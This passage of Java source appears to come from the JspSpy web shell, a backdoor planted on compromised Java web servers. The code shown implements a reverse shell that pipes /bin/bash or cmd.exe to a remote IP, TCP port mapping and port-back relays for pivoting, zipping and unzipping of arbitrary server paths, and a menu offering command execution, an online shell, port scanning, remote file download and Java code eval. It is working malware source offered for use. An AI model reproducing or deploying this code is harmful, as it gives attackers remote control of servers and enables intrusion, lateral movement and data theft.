2823.  
2824. private boolean config = false;
2825. private String extFilter = "blacklist";
2826. private String[] fileExts = null;
2827. private String sizeFilter = "no";
2828. private int filesize = 0;
2829. private String[] exclude = null;
2830. private String packFile = null;
2831.  
2832. private void reset() {
2833. this.config = false;
2834. this.extFilter = "blacklist";
2835. this.fileExts = null;
2836. this.sizeFilter = "no";
2837. this.filesize = 0;
2838. this.exclude = null;
2839. this.packFile = null;
2840. }
2841.  
2842. public void invoke(HttpServletRequest request,
2843. HttpServletResponse response, HttpSession JSession)
2844. throws Exception {
2845. try {
2846. String config = request.getParameter("config");
2847. if (!Util.isEmpty(config) && config.equals("true")) {
2848. this.config = true;
2849. this.extFilter = request.getParameter("extfilter");
2850. this.fileExts = request.getParameter("fileext").split(",");
2851. this.sizeFilter = request.getParameter("sizefilter");
2852. this.filesize = Integer.parseInt(request
2853. .getParameter("filesize"));
2854. this.exclude = request.getParameter("exclude").split(",");
2855. }
2856. String packedFile = request.getParameter("packedfile");
2857. if (Util.isEmpty(packedFile))
2858. return;
2859. this.packFile = packedFile;
2860. String saveFileName = request.getParameter("savefilename");
2861. File saveF = null;
2862. if (this.config)
2863. saveF = new File(saveFileName);
2864. else
2865. saveF = new File(JSession.getAttribute(CURRENT_DIR)
2866. .toString(), saveFileName);
2867. if (saveF.exists()) {
2868. JSession.setAttribute(MSG, "The File \"" + saveFileName
2869. + "\" Has Been Exists!");
2870. response.sendRedirect(SHELL_NAME);
2871. return;
2872. }
2873. File pF = new File(packedFile);
2874. ZipOutputStream zout = null;
2875. String base = "";
2876. if (pF.isDirectory()) {
2877. if (pF.listFiles().length == 0) {
2878. JSession
2879. .setAttribute(MSG,
2880. "No File To Pack ! Maybe The Directory Is Empty .");
2881. response.sendRedirect(SHELL_NAME);
2882. this.reset();
2883. return;
2884. }
2885. zout = new ZipOutputStream(new BufferedOutputStream(
2886. new FileOutputStream(saveF)));
2887. zipDir(pF, base, zout);
2888. } else {
2889. zout = new ZipOutputStream(new BufferedOutputStream(
2890. new FileOutputStream(saveF)));
2891. zipFile(pF, base, zout);
2892. }
2893. zout.close();
2894. this.reset();
2895. JSession.setAttribute(MSG, "Pack File Success!");
2896. response.sendRedirect(SHELL_NAME);
2897. } catch (Exception e) {
2898. throw e;
2899. }
2900. }
2901.  
2902. public void zipDir(File f, String base, ZipOutputStream zout)
2903. throws Exception {
2904. if (f.isDirectory()) {
2905. if (this.config) {
2906. String curName = f.getAbsolutePath().replace('\\', '/');
2907. curName = curName.replaceAll("\\Q" + this.packFile + "\\E",
2908. "");
2909. if (this.exclude != null) {
2910. for (int i = 0; i < exclude.length; i++) {
2911. if (!Util.isEmpty(exclude[i])
2912. && curName.startsWith(exclude[i])) {
2913. return;
2914. }
2915. }
2916. }
2917. }
2918. File[] arr = f.listFiles();
2919. for (int i = 0; i < arr.length; i++) {
2920. File ff = arr[i];
2921. String tmpBase = base;
2922. if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/"))
2923. tmpBase += "/";
2924. zipDir(ff, tmpBase + f.getName(), zout);
2925. }
2926. } else {
2927. String tmpBase = base;
2928. if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/"))
2929. tmpBase += "/";
2930. zipFile(f, tmpBase, zout);
2931. }
2932.  
2933. }
2934.  
2935. public void zipFile(File f, String base, ZipOutputStream zout)
2936. throws Exception {
2937. if (this.config) {
2938. String ext = f.getName().substring(
2939. f.getName().lastIndexOf('.') + 1);
2940. if (this.extFilter.equals("blacklist")) {
2941. if (Util.exists(this.fileExts, ext)) {
2942. return;
2943. }
2944. } else if (this.extFilter.equals("whitelist")) {
2945. if (!Util.exists(this.fileExts, ext)) {
2946. return;
2947. }
2948. }
2949. if (!this.sizeFilter.equals("no")) {
2950. double size = f.length() / 1024;
2951. if (this.sizeFilter.equals("greaterthan")) {
2952. if (size < filesize)
2953. return;
2954. } else if (this.sizeFilter.equals("lessthan")) {
2955. if (size > filesize)
2956. return;
2957. }
2958. }
2959. }
2960. ZipEntry entry = new ZipEntry(base + f.getName());
2961. zout.putNextEntry(entry);
2962. FileInputStream fInput = new FileInputStream(f);
2963. int len = 0;
2964. byte[] buf = new byte[1024];
2965. while ((len = fInput.read(buf)) != -1) {
2966. zout.write(buf, 0, len);
2967. zout.flush();
2968. }
2969. fInput.close();
2970. }
2971. }
2972.  
2973. private static class UnPackInvoker extends DefaultInvoker {
2974. public boolean doBefore() {
2975. return false;
2976. }
2977.  
2978. public boolean doAfter() {
2979. return false;
2980. }
2981.  
2982. public void invoke(HttpServletRequest request,
2983. HttpServletResponse response, HttpSession JSession)
2984. throws Exception {
2985. try {
2986. String savepath = request.getParameter("savepath");
2987. String zipfile = request.getParameter("zipfile");
2988. if (Util.isEmpty(savepath) || Util.isEmpty(zipfile))
2989. return;
2990. File save = new File(savepath);
2991. save.mkdirs();
2992. ZipFile file = new ZipFile(new File(zipfile));
2993. Enumeration e = file.entries();
2994. while (e.hasMoreElements()) {
2995. ZipEntry en = (ZipEntry) e.nextElement();
2996. String entryPath = en.getName();
2997. int index = entryPath.lastIndexOf("/");
2998. if (index != -1)
2999. entryPath = entryPath.substring(0, index);
3000. File absEntryFile = new File(save, entryPath);
3001. if (!absEntryFile.exists()
3002. && (en.isDirectory() || en.getName().indexOf("/") != -1))
3003. absEntryFile.mkdirs();
3004. BufferedOutputStream output = null;
3005. BufferedInputStream input = null;
3006. try {
3007. output = new BufferedOutputStream(new FileOutputStream(
3008. new File(save, en.getName())));
3009. input = new BufferedInputStream(file.getInputStream(en));
3010. byte[] b = new byte[1024];
3011. int len = input.read(b);
3012. while (len != -1) {
3013. output.write(b, 0, len);
3014. len = input.read(b);
3015. }
3016. } catch (Exception ex) {
3017. } finally {
3018. try {
3019. if (output != null)
3020. output.close();
3021. if (input != null)
3022. input.close();
3023. } catch (Exception ex1) {
3024. }
3025. }
3026. }
3027. file.close();
3028. JSession.setAttribute(MSG, "UnPack File Success!");
3029. response.sendRedirect(SHELL_NAME);
3030. } catch (Exception e) {
3031.  
3032. throw e;
3033. }
3034. }
3035. }
3036.  
3037. //VMapPort
3038. private static class VmpInvoker extends DefaultInvoker {
3039. public void invoke(HttpServletRequest request,
3040. HttpServletResponse response, HttpSession JSession)
3041. throws Exception {
3042. try {
3043. PrintWriter out = response.getWriter();
3044. Object localIP = JSession.getAttribute("localIP");
3045. Object localPort = JSession.getAttribute("localPort");
3046. Object remoteIP = JSession.getAttribute("remoteIP");
3047. Object remotePort = JSession.getAttribute("remotePort");
3048. Object done = JSession.getAttribute("done");
3049.  
3050. JSession.removeAttribute("localIP");
3051. JSession.removeAttribute("localPort");
3052. JSession.removeAttribute("remoteIP");
3053. JSession.removeAttribute("remotePort");
3054. JSession.removeAttribute("done");
3055.  
3056. if (Util.isEmpty(localIP))
3057. localIP = InetAddress.getLocalHost().getHostAddress();
3058. if (Util.isEmpty(localPort))
3059. localPort = "3389";
3060. if (Util.isEmpty(remoteIP))
3061. remoteIP = "www.baidu.com";
3062. if (Util.isEmpty(remotePort))
3063. remotePort = "80";
3064. if (!Util.isEmpty(done))
3065. Util.outMsg(out, done.toString());
3066.  
3067. out
3068. .println("<form action=\""
3069. + SHELL_NAME
3070. + "\" method=\"post\">"
3071. + "<input type=\"hidden\" name=\"o\" value=\"mapPort\">"
3072. + " <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3073. + " <tr>"
3074. + " <td><h2 id=\"Bin_H2_Title\">PortMap &gt;&gt;<hr/></h2>"
3075. + " <div id=\"hOWTm\">"
3076. + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"
3077. + " <tr align=\"center\">"
3078. + " <td style=\"width:5%\"></td>"
3079. + " <td style=\"width:20%\" align=\"left\"><br/>Local Ip :"
3080. + " <input name=\"localIP\" id=\"localIP\" type=\"text\" class=\"input\" size=\"20\" value=\""
3081. + localIP
3082. + "\" />"
3083. + " </td>"
3084. + " <td style=\"width:20%\" align=\"left\">Local Port :"
3085. + " <input name=\"localPort\" id=\"localPort\" type=\"text\" class=\"input\" size=\"20\" value=\""
3086. + localPort
3087. + "\" /></td>"
3088. + " <td style=\"width:20%\" align=\"left\">Remote Ip :"
3089. + " <input name=\"remoteIP\" id=\"remoteIP\" type=\"text\" class=\"input\" size=\"20\" value=\""
3090. + remoteIP
3091. + "\" /></td>"
3092. + " <td style=\"width:20%\" align=\"left\">Remote Port :"
3093. + " <input name=\"remotePort\" id=\"remotePort\" type=\"text\" class=\"input\" size=\"20\" value=\""
3094. + remotePort
3095. + "\" /></td>"
3096. + " </tr>"
3097. + " <tr align=\"center\">"
3098. + " <td colspan=\"5\"><br/>"
3099. + " <input type=\"submit\" name=\"FJE\" value=\"MapPort\" id=\"FJE\" class=\"bt\" />"
3100. + " <input type=\"button\" name=\"giX\" value=\"ClearAll\" id=\"giX\" onClick=\"location.href='"
3101. + SHELL_NAME + "?o=smp'\" class=\"bt\" />"
3102. + " </td>" + " </tr>" + " </table>"
3103. + " </div>" + "</td>" + "</tr>" + "</table>"
3104. + "</form>");
3105. String targetIP = request.getParameter("targetIP");
3106. String targetPort = request.getParameter("targetPort");
3107. String yourIP = request.getParameter("yourIP");
3108. String yourPort = request.getParameter("yourPort");
3109. if (Util.isEmpty(targetIP))
3110. targetIP = "127.0.0.1";
3111. if (Util.isEmpty(targetPort))
3112. targetPort = "3389";
3113. if (Util.isEmpty(yourIP))
3114. yourIP = request.getRemoteAddr();
3115. if (Util.isEmpty(yourPort))
3116. yourPort = "53";
3117. out
3118. .println("<form action=\""
3119. + SHELL_NAME
3120. + "\" method=\"post\">"
3121. + "<input type=\"hidden\" name=\"o\" value=\"portBack\">"
3122. + " <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3123. + " <tr>"
3124. + " <td><h2 id=\"Bin_H2_Title\">Port Back &gt;&gt;<hr/></h2>"
3125. + " <div id=\"hOWTm\">"
3126. + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"
3127. + " <tr align=\"center\">"
3128. + " <td style=\"width:5%\"></td>"
3129. + " <td style=\"width:20%\" align=\"left\"><br/>Target Ip :"
3130. + " <input name=\"targetIP\" id=\"targetIP\" type=\"text\" class=\"input\" size=\"20\" value=\""
3131. + targetIP
3132. + "\" />"
3133. + " </td>"
3134. + " <td style=\"width:20%\" align=\"left\">Target Port :"
3135. + " <input name=\"targetPort\" id=\"targetPort\" type=\"text\" class=\"input\" size=\"20\" value=\""
3136. + targetPort
3137. + "\" /></td>"
3138. + " <td style=\"width:20%\" align=\"left\">Your Ip :"
3139. + " <input name=\"yourIP\" id=\"yourIP\" type=\"text\" class=\"input\" size=\"20\" value=\""
3140. + yourIP
3141. + "\" /></td>"
3142. + " <td style=\"width:20%\" align=\"left\">Your Port :"
3143. + " <input name=\"yourPort\" id=\"yourPort\" type=\"text\" class=\"input\" size=\"20\" value=\""
3144. + yourPort
3145. + "\" /></td>"
3146. + " </tr>"
3147. + " <tr align=\"center\">"
3148. + " <td colspan=\"5\"><br/>"
3149. + " <input type=\"submit\" name=\"FJE\" value=\"Port Back\" id=\"FJE\" class=\"bt\" />"
3150. + " </td>" + " </tr>" + " </table>"
3151. + " </div>" + "</td>" + "</tr>" + "</table>"
3152. + "</form>");
3153. } catch (Exception e) {
3154.  
3155. throw e;
3156. }
3157. }
3158. }
3159.  
3160. //StopMapPort
3161. private static class SmpInvoker extends DefaultInvoker {
3162. public boolean doAfter() {
3163. return true;
3164. }
3165.  
3166. public boolean doBefore() {
3167. return true;
3168. }
3169.  
3170. public void invoke(HttpServletRequest request,
3171. HttpServletResponse response, HttpSession JSession)
3172. throws Exception {
3173. try {
3174. Object obj = JSession.getAttribute(PORT_MAP);
3175. if (obj != null) {
3176. ServerSocket server = (ServerSocket) JSession
3177. .getAttribute(PORT_MAP);
3178. server.close();
3179. }
3180. JSession.setAttribute("done", "Stop Success!");
3181. ((Invoker) ins.get("vmp")).invoke(request, response, JSession);
3182. } catch (Exception e) {
3183.  
3184. throw e;
3185. }
3186. }
3187. }
3188.  
3189. //PortBack
3190. private static class PortBackInvoker extends DefaultInvoker {
3191. public boolean doAfter() {
3192. return true;
3193. }
3194.  
3195. public boolean doBefore() {
3196. return true;
3197. }
3198.  
3199. public void invoke(HttpServletRequest request,
3200. HttpServletResponse response, HttpSession JSession)
3201. throws Exception {
3202. try {
3203. String targetIP = request.getParameter("targetIP");
3204. String targetPort = request.getParameter("targetPort");
3205. String yourIP = request.getParameter("yourIP");
3206. String yourPort = request.getParameter("yourPort");
3207. Socket yourS = new Socket();
3208. yourS.connect(new InetSocketAddress(yourIP, Integer
3209. .parseInt(yourPort)));
3210. Socket targetS = new Socket();
3211. targetS.connect(new InetSocketAddress(targetIP, Integer
3212. .parseInt(targetPort)));
3213. StreamConnector.readFromLocal(new DataInputStream(targetS
3214. .getInputStream()), new DataOutputStream(yourS
3215. .getOutputStream()));
3216. StreamConnector.readFromRemote(targetS, yourS,
3217. new DataInputStream(yourS.getInputStream()),
3218. new DataOutputStream(targetS.getOutputStream()));
3219. JSession.setAttribute("done", "Port Back Success !");
3220. ((Invoker) ins.get("vmp")).invoke(request, response, JSession);
3221. } catch (Exception e) {
3222.  
3223. throw e;
3224. }
3225. }
3226. }
3227.  
3228. private static class MapPortInvoker extends DefaultInvoker {
3229. public boolean doBefore() {
3230. return false;
3231. }
3232.  
3233. public boolean doAfter() {
3234. return false;
3235. }
3236.  
3237. public void invoke(HttpServletRequest request,
3238. HttpServletResponse response, HttpSession JSession)
3239. throws Exception {
3240. try {
3241. PrintWriter out = response.getWriter();
3242. String localIP = request.getParameter("localIP");
3243. String localPort = request.getParameter("localPort");
3244. final String remoteIP = request.getParameter("remoteIP");
3245. final String remotePort = request.getParameter("remotePort");
3246. if (Util.isEmpty(localIP) || Util.isEmpty(localPort)
3247. || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort))
3248. return;
3249. Object obj = JSession.getAttribute(PORT_MAP);
3250. if (obj != null) {
3251. ServerSocket s = (ServerSocket) obj;
3252. s.close();
3253. }
3254. final ServerSocket server = new ServerSocket();
3255. server.bind(new InetSocketAddress(localIP, Integer
3256. .parseInt(localPort)));
3257. JSession.setAttribute(PORT_MAP, server);
3258. new Thread(new Runnable() {
3259. public void run() {
3260. while (true) {
3261. Socket soc = null;
3262. Socket remoteSoc = null;
3263. DataInputStream remoteIn = null;
3264. DataOutputStream remoteOut = null;
3265. DataInputStream localIn = null;
3266. DataOutputStream localOut = null;
3267. try {
3268. soc = server.accept();
3269. remoteSoc = new Socket();
3270. remoteSoc
3271. .connect(new InetSocketAddress(
3272. remoteIP, Integer
3273. .parseInt(remotePort)));
3274. remoteIn = new DataInputStream(remoteSoc
3275. .getInputStream());
3276. remoteOut = new DataOutputStream(remoteSoc
3277. .getOutputStream());
3278. localIn = new DataInputStream(soc
3279. .getInputStream());
3280. localOut = new DataOutputStream(soc
3281. .getOutputStream());
3282. StreamConnector.readFromLocal(localIn,
3283. remoteOut);
3284. StreamConnector.readFromRemote(soc, remoteSoc,
3285. remoteIn, localOut);
3286. } catch (Exception ex) {
3287. break;
3288. }
3289. }
3290. }
3291.  
3292. }).start();
3293. JSession.setAttribute("done", "Map Port Success!");
3294. JSession.setAttribute("localIP", localIP);
3295. JSession.setAttribute("localPort", localPort);
3296. JSession.setAttribute("remoteIP", remoteIP);
3297. JSession.setAttribute("remotePort", remotePort);
3298. JSession.setAttribute(SESSION_O, "vmp");
3299. response.sendRedirect(SHELL_NAME);
3300. } catch (Exception e) {
3301.  
3302. throw e;
3303. }
3304. }
3305. }
3306.  
3307. //VBackConnect
3308. private static class VbcInvoker extends DefaultInvoker {
3309. public void invoke(HttpServletRequest request,
3310. HttpServletResponse response, HttpSession JSession)
3311. throws Exception {
3312. try {
3313. PrintWriter out = response.getWriter();
3314. Object ip = JSession.getAttribute("ip");
3315. Object port = JSession.getAttribute("port");
3316. Object program = JSession.getAttribute("program");
3317. Object done = JSession.getAttribute("done");
3318. JSession.removeAttribute("ip");
3319. JSession.removeAttribute("port");
3320. JSession.removeAttribute("program");
3321. JSession.removeAttribute("done");
3322. if (Util.isEmpty(ip))
3323. ip = request.getRemoteAddr();
3324. if (Util.isEmpty(port) || !Util.isInteger(port.toString()))
3325. port = "53";
3326. if (Util.isEmpty(program)) {
3327. if (ISLINUX)
3328. program = "/bin/bash";
3329. else
3330. program = "cmd.exe";
3331. }
3332.  
3333. if (!Util.isEmpty(done))
3334. Util.outMsg(out, done.toString());
3335. out
3336. .println("<form action=\""
3337. + SHELL_NAME
3338. + "\" method=\"post\">"
3339. + "<input type=\"hidden\" name=\"o\" value=\"backConnect\">"
3340. + " <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3341. + " <tr>"
3342. + " <td><h2 id=\"Bin_H2_Title\">Back Connect &gt;&gt;</h2>"
3343. + " <div id=\"hOWTm\">"
3344. + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"
3345. + " <tr align=\"center\">"
3346. + " <td style=\"width:5%\"></td>"
3347. + " <td align=\"center\">Your Ip :"
3348. + " <input name=\"ip\" id=\"ip\" type=\"text\" class=\"input\" size=\"20\" value=\""
3349. + ip
3350. + "\" />"
3351. + " Your Port :"
3352. + " <input name=\"port\" id=\"port\" type=\"text\" class=\"input\" size=\"20\" value=\""
3353. + port
3354. + "\" />Program To Back :"
3355. + " <input name=\"program\" id=\"program\" type=\"text\" value=\""
3356. + program
3357. + "\" class=\"input\" size=\"20\" value=\"d\" /></td>"
3358. + " </tr>"
3359. + " <tr align=\"center\">"
3360. + " <td colspan=\"2\"><br/>"
3361. + " <input type=\"submit\" name=\"FJE\" value=\"Connect\" id=\"FJE\" class=\"bt\" />"
3362. + " </td>" + " </tr>" + " </table>"
3363. + " </div>" + "</td>" + "</tr>" + "</table>"
3364. + "</form>");
3365. } catch (Exception e) {
3366.  
3367. throw e;
3368. }
3369. }
3370. }
3371.  
3372. private static class BackConnectInvoker extends DefaultInvoker {
3373. public boolean doAfter() {
3374. return false;
3375. }
3376.  
3377. public boolean doBefore() {
3378. return false;
3379. }
3380.  
3381. public void invoke(HttpServletRequest request,
3382. HttpServletResponse response, HttpSession JSession)
3383. throws Exception {
3384. try {
3385. String ip = request.getParameter("ip");
3386. String port = request.getParameter("port");
3387. String program = request.getParameter("program");
3388. if (Util.isEmpty(ip) || Util.isEmpty(program)
3389. || !Util.isInteger(port))
3390. return;
3391. Socket socket = new Socket(ip, Integer.parseInt(port));
3392. Process process = Runtime.getRuntime().exec(program);
3393. (new StreamConnector(process.getInputStream(), socket
3394. .getOutputStream())).start();
3395. (new StreamConnector(process.getErrorStream(), socket
3396. .getOutputStream())).start();
3397. (new StreamConnector(socket.getInputStream(), process
3398. .getOutputStream())).start();
3399. JSession.setAttribute("done", "Back Connect Success!");
3400. JSession.setAttribute("ip", ip);
3401. JSession.setAttribute("port", port);
3402. JSession.setAttribute("program", program);
3403. JSession.setAttribute(SESSION_O, "vbc");
3404. response.sendRedirect(SHELL_NAME);
3405. } catch (Exception e) {
3406.  
3407. throw e;
3408. }
3409. }
3410. }
3411.  
3412. private static class JspEnvInvoker extends DefaultInvoker {
3413. public void invoke(HttpServletRequest request,
3414. HttpServletResponse response, HttpSession JSession)
3415. throws Exception {
3416. try {
3417. PrintWriter out = response.getWriter();
3418. out
3419. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3420. + " <tr>"
3421. + " <td><h2 id=\"Ninty_H2_Title\">System Properties &gt;&gt;</h2>"
3422. + " <div id=\"ghaB\">"
3423. + " <hr/>"
3424. + " <ul id=\"Ninty_Ul_Sys\" class=\"info\">");
3425. Properties pro = System.getProperties();
3426. Enumeration names = pro.propertyNames();
3427. while (names.hasMoreElements()) {
3428. String name = (String) names.nextElement();
3429. out.println("<li><u>" + Util.htmlEncode(name) + " : </u>"
3430. + Util.htmlEncode(pro.getProperty(name)) + "</li>");
3431. }
3432. out
3433. .println("</ul><h2 id=\"Ninty_H2_Mac\">System Environment &gt;&gt;</h2><hr/><ul id=\"Ninty_Ul_Sys\" class=\"info\">");
3434. /*
3435. Map envs = System.getenv();
3436. Set<Map.Entry<String,String>> entrySet = envs.entrySet();
3437. for (Map.Entry<String,String> en:entrySet) {
3438. out.println("<li><u>"+Util.htmlEncode(en.getKey())+" : </u>"+Util.htmlEncode(en.getValue())+"</li>");
3439. }*/
3440. out
3441. .println("</ul></div></td>" + " </tr>"
3442. + " </table>");
3443. } catch (Exception e) {
3444.  
3445. throw e;
3446. }
3447. }
3448. }
3449.  
3450. private static class ReflectInvoker extends DefaultInvoker {
3451. public void invoke(HttpServletRequest request,
3452. HttpServletResponse response, HttpSession JSession)
3453. throws Exception {
3454. try {
3455. PrintWriter out = response.getWriter();
3456. String c = request.getParameter("Class");
3457. Class cls = null;
3458. try {
3459. if (!Util.isEmpty(c))
3460. cls = Class.forName(c);
3461. } catch (ClassNotFoundException ex) {
3462. Util.outMsg(out, "<span style='color:red'>Class " + c
3463. + " Not Found ! </span>");
3464. }
3465. out
3466. .println("<form action=\""
3467. + SHELL_NAME
3468. + "\" id='refForm' method=\"post\">"
3469. + " <input type=\"hidden\" name=\"o\" value=\"reflect\">"
3470. + " <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3471. + " <tr>"
3472. + " <td><h2 id=\"Bin_H2_Title\">Java Reflect &gt;&gt;</h2>"
3473. + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"
3474. + " <tr>"
3475. + " <td>Class Name : <input name=\"Class\" type=\"text\" class=\"input\" value=\""
3476. + (Util.isEmpty(c) ? "java.lang.Object" : c)
3477. + "\" size=\"60\"/> "
3478. + " <input type=\"submit\" class=\"bt\" value=\"Reflect\"/></td>"
3479. + " </tr>" + " "
3480. + " </table>" + " </td>"
3481. + " </tr>" + " </table>" + "</form>");
3482.  
3483. if (cls != null) {
3484. StringBuffer sb = new StringBuffer();
3485. if (cls.getPackage() != null)
3486. sb.append("package " + cls.getPackage().getName()
3487. + ";\n");
3488. String n = null;
3489. if (cls.isInterface())
3490. n = "";
3491. //else if (cls.isEnum())
3492. // n = "enum";
3493. else
3494. n = "class";
3495. sb.append(Modifier.toString(cls.getModifiers()) + " " + n
3496. + " " + cls.getName() + "\n");
3497. if (cls.getSuperclass() != null)
3498. sb
3499. .append("\textends <a href=\"javascript:document.forms['refForm'].elements['Class'].value='"
3500. + cls.getSuperclass().getName()
3501. + "';document.forms['refForm'].submit()\" style='color:red;'>"
3502. + cls.getSuperclass().getName()
3503. + "</a>\n");
3504. if (cls.getInterfaces() != null
3505. && cls.getInterfaces().length != 0) {
3506. Class[] faces = cls.getInterfaces();
3507. sb.append("\t implements ");
3508. for (int i = 0; i < faces.length; i++) {
3509. sb
3510. .append("<a href=\"javascript:document.forms['refForm'].elements['Class'].value='"
3511. + faces[i].getName()
3512. + "';document.forms['refForm'].submit()\" style='color:red'>"
3513. + faces[i].getName() + "</a>");
3514. if (i != faces.length - 1) {
3515. sb.append(",");
3516. }
3517. }
3518. }
3519. sb.append("{\n\t\n");
3520. sb.append("\t//constructors..\n");
3521. Constructor[] cs = cls.getConstructors();
3522. for (int i = 0; i < cs.length; i++) {
3523. Constructor cc = cs[i];
3524. sb.append("\t" + cc + ";\n");
3525. }
3526. sb.append("\n\t//fields\n");
3527. Field[] fs = cls.getDeclaredFields();
3528. for (int i = 0; i < fs.length; i++) {
3529. Field f = fs[i];
3530. sb.append("\t" + f.toString() + ";");
3531. if (Modifier.toString(f.getModifiers()).indexOf(
3532. "static") != -1) {
3533. sb.append("\t//value is : ");
3534. f.setAccessible(true);
3535. Object obj = f.get(null);
3536. sb.append("<span style='color:red'>");
3537. if (obj != null)
3538. sb.append(obj.toString());
3539. else
3540. sb.append("NULL");
3541.  
3542. sb.append("</span>");
3543. }
3544. sb.append("\n");
3545. }
3546.  
3547. sb.append("\n\t//methods\n");
3548. Method[] ms = cls.getDeclaredMethods();
3549. for (int i = 0; i < ms.length; i++) {
3550. Method m = ms[i];
3551. sb.append("\t" + m.toString() + ";\n");
3552. }
3553. sb.append("}\n");
3554. String m = "<span style='font-weight:normal'>"
3555. + Util.highLight(sb.toString()).replaceAll("\t",
3556. "&nbsp;&nbsp;&nbsp;&nbsp;").replaceAll(
3557. "\n", "<br/>") + "</span>";
3558. Util.outMsg(out, m, "left");
3559. }
3560. } catch (Exception e) {
3561. throw e;
3562. }
3563. }
3564. }
3565.  
3566. private static class TopInvoker extends DefaultInvoker {
3567. public void invoke(HttpServletRequest request,
3568. HttpServletResponse response, HttpSession JSession)
3569. throws Exception {
3570. try {
3571. PrintWriter out = response.getWriter();
3572. out
3573. .println("<form action=\""
3574. + SHELL_NAME
3575. + "\" method=\"post\" name=\"doForm\"></form>"
3576. + "<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">"
3577. + " <tr class=\"head\">"
3578. + " <td><span style=\"float:right;\">JspSpy Ver: 2010</span>"
3579. + request.getHeader("host")
3580. + " (<span id='ip'>"
3581. + InetAddress.getLocalHost().getHostAddress()
3582. + "</span>) | <a href=\"javascript:if (!window.clipboardData){alert('only support IE!');}else{void(window.clipboardData.setData('Text', document.getElementById('ip').innerText));alert('ok')}\">copy</a></td>"
3583. + " </tr>"
3584. + " <tr class=\"alt1\">"
3585. + " <td><a href=\"javascript:doPost({o:'logout'});\">Logout</a> | "
3586. + " <a href=\"javascript:doPost({o:'fileList'});\">File Manager</a> | "
3587. + " <a href=\"javascript:doPost({o:'vConn'});\">DataBase Manager</a> | "
3588. + " <a href=\"javascript:doPost({o:'vs'});\">Execute Command</a> | "
3589. + " <a href=\"javascript:doPost({o:'vso'});\">Shell OnLine</a> | "
3590. + " <a href=\"javascript:doPost({o:'vbc'});\">Back Connect</a> | "
3591. + " <a href=\"javascript:doPost({o:'reflect'});\">Java Reflect</a> | "
3592. + " <!--<a href=\"javascript:alert('not support yet');\">Http Proxy</a> | -->"
3593. + " <a href=\"javascript:doPost({o:'ev'});\">Eval Java Code</a> | "
3594. + " <a href=\"javascript:doPost({o:'vPortScan'});;\">Port Scan</a> | "
3595. + " <a href=\"javascript:doPost({o:'vd'});\">Download Remote File</a> | "
3596. + " <a href=\"javascript:;doPost({o:'clipboard'});\">ClipBoard</a> | "
3597. + " <a href=\"javascript:doPost({o:'vmp'});\">Port Map</a> | "
3598. + " <a href=\"javascript:doPost({o:'vother'});\">Others</a> | "
3599. + " <a href=\"javascript:doPost({o:'jspEnv'});\">JSP Env</a> "
3600. + " </tr>" + "</table>");
3601. if (JSession.getAttribute(MSG) != null) {
3602. Util.outMsg(out, JSession.getAttribute(MSG).toString());
3603. JSession.removeAttribute(MSG);
3604. }
3605. if (JSession.getAttribute(ENTER_MSG) != null) {
3606. String outEntry = request.getParameter("outentry");
3607. if (Util.isEmpty(outEntry) || !outEntry.equals("true"))
3608. Util.outMsg(out, JSession.getAttribute(ENTER_MSG)
3609. .toString());
3610. }
3611. } catch (Exception e) {
3612.  
3613. throw e;
3614. }
3615. }
3616. }
3617.  
3618. private static class VOnLineShellInvoker extends DefaultInvoker {
3619. public void invoke(HttpServletRequest request,
3620. HttpServletResponse response, HttpSession JSession)
3621. throws Exception {
3622. try {
3623. PrintWriter out = response.getWriter();
3624. out
3625. .println("<script>"
3626. + " function $(id) {"
3627. + " return document.getElementById(id);"
3628. + " }"
3629. + " var ie = window.navigator.userAgent.toLowerCase().indexOf(\"msie\") != -1;"
3630. + " window.onload = function(){"
3631. + " setInterval(function(){"
3632. + " if ($(\"autoscroll\").checked)"
3633. + " {"
3634. + " var f = window.frames[\"echo\"];"
3635. + " if (f && f.document && f.document.body)"
3636. + " {"
3637. + " if (!ie)"
3638. + " {"
3639. + " if (f.document.body.offsetHeight)"
3640. + " {"
3641. + " f.scrollTo(0,parseInt(f.document.body.offsetHeight)+1);"
3642. + " }"
3643. + " } else {"
3644. + " f.scrollTo(0,parseInt(f.document.body.scrollHeight)+1);"
3645. + " }" + " }" + " }"
3646. + " },500);" + " }" + " </script>");
3647. out
3648. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3649. + " <tr>" + " <td>");
3650. out.println("<h2>Shell OnLine &raquo;</h2><br/>");
3651. out
3652. .println("<form action=\""
3653. + SHELL_NAME
3654. + "\" method=\"post\" target=\"echo\" onsubmit=\"$('cmd').focus()\">"
3655. + " <input type=\"submit\" value=\" start \" class=\"bt\">"
3656. + " <input type=\"text\" name=\"exe\" style=\"width:300px\" class=\"input\" value=\""
3657. + (ISLINUX ? "/bin/bash"
3658. : "c:\\windows\\system32\\cmd.exe")
3659. + "\"/>"
3660. + " <input type=\"hidden\" name=\"o\" value=\"online\"/><input type=\"hidden\" name=\"type\" value=\"start\"/><span class=\"tip\">Notice ! If You Are Using IE , You Must Input Some Commands First After You Start Or You Will Not See The Echo</span>"
3661. + " </form>"
3662. + " <hr/>"
3663. + " <iframe class=\"secho\" name=\"echo\" src=\"\">"
3664. + " </iframe>"
3665. + " <form action=\""
3666. + SHELL_NAME
3667. + "\" method=\"post\" onsubmit=\"this.submit();$('cmd').value='';return false;\" target=\"asyn\">"
3668. + " <input type=\"text\" id=\"cmd\" name=\"cmd\" class=\"input\" style=\"width:75%\">"
3669. + " <input name=\"o\" id=\"o\" type=\"hidden\" value=\"online\"/><input type=\"hidden\" id=\"ddtype\" name=\"type\" value=\"ecmd\"/>"
